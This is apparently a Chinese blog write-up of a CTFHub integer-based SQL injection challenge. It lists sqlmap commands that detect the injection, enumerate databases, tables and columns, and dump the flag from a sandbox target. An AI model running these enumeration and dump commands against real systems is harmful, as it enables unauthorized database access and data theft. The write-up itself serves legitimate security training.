首页 > 数据库 >CTFHUB WEB-SQL注入-整数型注入

CTFHUB WEB-SQL注入-整数型注入

时间:2022-10-22 11:44:22浏览次数:58  
标签:sqlmap WEB http CTFHUB challenge sqli 10800 id 注入

1.题目

2.使用的环境及工具

环境:kail linux

工具:sqlmap

3.操作步骤

本题是基于sql的注入,首先考虑sqlmap,先查看这个sql是否存在注入

~~~sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1      

 

检查一下全部数据库内容

sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1 --dbs

 

 返回值有四个,但是除了sqli,其他都是配置,所以重点在sqli上

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

 

 发现表了之后访问sqli的所有列

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

 

 最后读取flag的值

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

 

标签:sqlmap,WEB,http,CTFHUB,challenge,sqli,10800,id,注入
From: https://www.cnblogs.com/manmanwei/p/16815704.html

相关文章

  • bean注入属性的几种方式
    bean注入属性的几种方式1.set方法注入2.构造器注入3.静态工厂注入4.实例工厂注入​​Spring中bean的四种注入方式-特务依昂-博客园(cnblogs.com)​​spring中注入bean......
  • 再次认识 WebAssembly
    WebAssembly(Wasm)是基于堆栈的虚拟机的二进制指令格式,一种低级汇编语言,旨在非常接近已编译的机器代码,并且非常接近本机性能。前面在文章《​​​​快速认识WebAssembly​​......
  • Web前端5
    1.什么是HTML?......
  • Web前端6
    2.HTML标签......
  • Web前端7
    3.HTML元素......
  • webscraper 无代码爬虫
    官网:https://www.webscraper.io/web-scraper-first-time-installwebscraper简介WebScraper是一款免费的,适用于普通用户的爬虫工具,可以方便的通过鼠标和简单配置获取网......
  • iOS如何编译webrtc源码并生成sdk
    webrtc是google开源的代码,但是代码都放在google的服务器上,然后有墙懂的都懂mkdirwebrtccdwebrtcgitclonehttps://chromium.googlesource.com/chromium/tools/de......
  • web服务器4
    consthttp=require('http')constserver=http.createServer()server.on('request',(req,res)=>{letcontent='<h1>404Notfound!</h1>'consturl=r......
  • RedHat8--web控制台【Redhat8专有】
    临时开启cockpit.service服务systemctlstartcockpit.service设置cockpit.service开机自启systemctlenable --nowcockpit.socket进入web控制台页面https:......
  • 爬虫基础知识(web前端,请求模块urllib,重构user_agent)
    ✅个人主页:​​hacker_demo的51CTO博客......